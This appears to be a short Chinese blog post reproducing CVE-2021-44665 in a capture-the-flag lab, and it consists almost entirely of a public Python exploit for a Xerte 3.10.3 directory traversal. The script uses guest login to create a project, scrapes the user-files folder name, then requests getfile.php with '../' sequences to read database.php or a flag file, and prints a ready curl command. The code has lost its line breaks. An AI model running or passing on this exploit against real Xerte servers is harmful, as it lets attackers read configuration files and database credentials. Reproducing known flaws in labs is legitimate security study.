当前位置：首页 > news >正文

CVE-2021-44665

news 2026/5/12 2:45:07

CVE-2021-44665复现

使用网上的exp

点击查看代码

# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip
# Version: up until 3.10.3
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44665# This PoC assumes guest login is enabled. Vulnerable url:
# https://<host>/getfile.php?file=<user-direcotry>/../../database.php
# You can find a userfiles-directory by creating a project and browsing the media menu.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download
# The userfiles-direcotry will be noted in the URL and/or when you download a file.
# They look like: <numbers>-<username>-<templatename>import requests
import re#xerte_base_url = "http://127.0.0.1"
#file_to_grab = "/../../database.php"
xerte_base_url = "http://eci-2ze3es0hytbbz6bch4u2.cloudeci1.ichunqiu.com"
file_to_grab = "/../../../../../flag"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.with requests.Session() as session:# Get a PHP session IDif not php_session_id:session.get(xerte_base_url) else:session.cookies.set("PHPSESSID", php_session_id)# Use a default templatedata = {'tutorialid': 'Nottingham','templatename': 'Nottingham','tutorialname': 'exploit','folder_id': ''}# Create a new project in order to create a user-foldertemplate_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)# Find template IDdata = {'template_id': re.findall('(\d+)', template_id.text)[0]}# Find the created user-direcotry:user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]# Grab fileresult = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)print(result.text)print("|-- Used Variables: --|")print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID'])print("user direcotry: " + user_direcotry)print("Curl example:")print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)

获得flag